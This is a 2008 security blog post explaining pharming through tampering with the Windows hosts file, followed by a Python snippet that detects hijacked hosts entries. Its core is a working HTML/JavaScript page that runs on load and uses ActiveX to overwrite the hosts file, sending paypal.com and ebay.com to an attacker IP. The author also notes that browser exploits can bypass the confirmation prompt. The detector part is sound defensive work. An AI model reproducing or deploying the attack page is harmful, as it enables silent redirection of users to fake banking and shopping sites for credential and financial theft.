Simple Pharming

May 5, 2008 – 5:17 AM

Today I decided to give a very brief example of pharming and why it's so easy to pharm surfers with little or no skill. Usually, browser exploit writers give simple examples of how to read the boot files or launch a calculator. There is so much you can do with Javascript that the best way to describe the toxic mix of browser exploits with Javascript is an example that launches a pharming attack. The sheer beauty of pharming is that the surfer will almost never know that he has been compromised, because it is very silent. One quick way to pharm surfers is to modify the hosts file on Windows.

The hosts file on XP is located at:

C:/WINDOWS/system32/Drivers/etc/hosts

and consists of something like this:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost

As you can see, the last line contains our 127.0.0.1 address, which is what the lookup resolves to when we type "localhost" into our browser. This is how these lookups are done these days. If the browser cannot locate the name, it will try different combinations, like appending www and .com to the request. The most important thing to know is that if this file is modified it stays modified, and it is very unobtrusive to its user because it only requires a one-time write access. Sadly, Microsoft doesn't seem to learn about the Active-X risks. As said before, I see no valid reason why Javascript should have write access to the file system.

The script below requires user confirmation in the browser, but like I said, some browser exploits will take care of this. It means that you can be pharmed without knowing it happened. That is the scariest part about it, and why browser exploits are so dangerous. In the script below we just route any traffic to our evil IP with only a small piece of Javascript that overwrites the surfer's hosts file.

<html>
<head>
<script language="javascript">
function pharmer(){
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);
    pharm.WriteLine('127.0.0.1       localhost');
    pharm.WriteLine('188.222.33.1    paypal');
    pharm.WriteLine('188.222.33.1    www.paypal.com');
    pharm.WriteLine('188.222.33.1    ebay.com');
    pharm.WriteLine('188.222.33.1    www.ebay.com');
    pharm.Close();
}
</script>
</head>
<body onLoad="pharmer()">
</body>
</html>

Et voilà, that's all there really is to a very basic pharming attack. Obviously there are more ways, but this gives a good example of what pharming exactly is and does, and how easy it actually can be.
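The flip side of the above is how a defender spots such a rewrite. The following is an added example, not part of the original post: it parses hosts-file syntax (leading whitespace, multiple hostnames per line, trailing `#` comments) and flags any mapping that pins a non-local name to a routable address, which is exactly the footprint the script above leaves. The file content is constructed inline to mirror the post's entries; PHARMED_HOSTS, parse_hosts and suspicious_entries are names chosen for this example.

```python
import ipaddress

# Constructed hosts-file content mirroring what the post's script writes;
# not read from any real system.
PHARMED_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
188.222.33.1    paypal
188.222.33.1    www.paypal.com   # trailing comment is legal hosts syntax
188.222.33.1    ebay.com www.ebay.com
"""

# Names that legitimately map to loopback on a workstation.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return a list of (ip_address, [hostnames]) for every mapping line.

    Blank lines, comment-only lines and anything after '#' are ignored,
    and a line whose first field is not a valid IP address is skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # malformed: an address with no hostname
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an IP address
        entries.append((ip, fields[1:]))
    return entries


def suspicious_entries(text):
    """Return (ip, hostname) pairs that redirect a non-local name to a routable host.

    Loopback and unspecified addresses are tolerated because ad-blocking style
    entries (127.0.0.1 / 0.0.0.0) use them; anything else pointing a real
    domain name elsewhere is the hijack described in the post.
    """
    flagged = []
    for ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        for name in names:
            if name.lower() not in LOCAL_NAMES:
                flagged.append((str(ip), name))
    return flagged
```

Run over the real file path from the post, the same check will also surface the bare-name entry (`paypal`) that the browser's "append www and .com" guessing turns into a usable hijack.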

Source: 0x000000
